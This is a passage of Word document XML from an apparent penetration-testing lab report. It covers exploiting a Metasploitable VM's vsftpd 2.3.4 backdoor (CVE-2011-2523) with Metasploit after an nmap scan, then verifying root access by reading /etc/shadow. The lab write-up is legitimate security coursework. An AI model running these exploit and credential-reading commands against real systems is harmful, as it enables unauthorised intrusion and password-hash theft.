          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ls -la /var/www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68950041" w14:textId="77777777" w:rsidR="00236891" w:rsidRDefault="00236891" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8065E3" w14:textId="77777777" w:rsidR="00236891" w:rsidRPr="00A000BA" w:rsidRDefault="00236891" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A502512" w14:textId="1A808224" w:rsidR="0043542B" w:rsidRDefault="00236891" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00236891">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F0D6DFA" wp14:editId="0209523A">
            <wp:extent cx="5943600" cy="3034030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1800028567" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F60AE8-CB32-4590-A44E-3A04E9CB96F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0028567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3034030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0043542B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F5F69A" w14:textId="5E293493" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.2 Exploit B: Legacy Service Exploitation (Metasploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202487D" w14:textId="033AA992" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.2.1 Service Discovery and Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA3B561" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Network scanning of Metasploitable (192.168.227.129) revealed extensive attack surface comprising outdated services with publicly documented vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F723F80" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Command Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFAF5AE" w14:textId="19960D35" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -A -p- 192.168.227.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFE86F" w14:textId="3F9F8D7D" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00F6106A"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F6106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F14C2A1" wp14:editId="2941C720">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="474654042" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE40C8CA-1E7C-4CA2-998E-A4666A79FB8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654042" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174A418" w14:textId="710D94A2" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.2.2 Exploitation of vsftpd 2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C80848" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>The vsftpd 2.3.4 service contained a deliberately introduced backdoor vulnerability (CVE-2011-2523) permitting unauthenticated remote code execution through malformed username authentication [25].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2A1A7" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Utilisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3041EF" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F5E457E" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9CBA2E" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.227.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9F5485" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set LHOST 192.168.227.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A5C0B" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80BAF6" w14:textId="1EA7302A" w:rsidR="004859A7" w:rsidRPr="000C1615" w:rsidRDefault="00100EEB"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100EEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C757A7" wp14:editId="6C53C657">
            <wp:extent cx="5943600" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1098550700" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF8725E5-9631-40BA-88C7-0A41A962CEF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8550700" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2935605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1680CD43" w14:textId="23DDCFFC" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Privilege Verification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664F3DC8" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09021593" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30025BCE" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/shadow | head -5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779416F" w14:textId="77777777" w:rsidR="000C1615" w:rsidRDefault="000C1615" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559086E1" w14:textId="6E9B3758" w:rsidR="000C1615" w:rsidRPr="00A000BA" w:rsidRDefault="000C1615" w:rsidP="004F019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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C1615">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A725A1" wp14:editId="1C0E2BF3">
            <wp:extent cx="5943600" cy="3122295"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1043253700" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E57F1207-1F91-46DC-984B-778B76183A8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3253700" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3122295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8E66F" w14:textId="77777777" w:rsidR="00CB2C98" w:rsidRDefault="00CB2C98" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFA384D" w14:textId="4CF51B7A" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00053404" w:rsidP="004F0197">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.3 Exploit C: Windows Domain Compromise (Windows Server 2019)</w:t>
      </w:r>
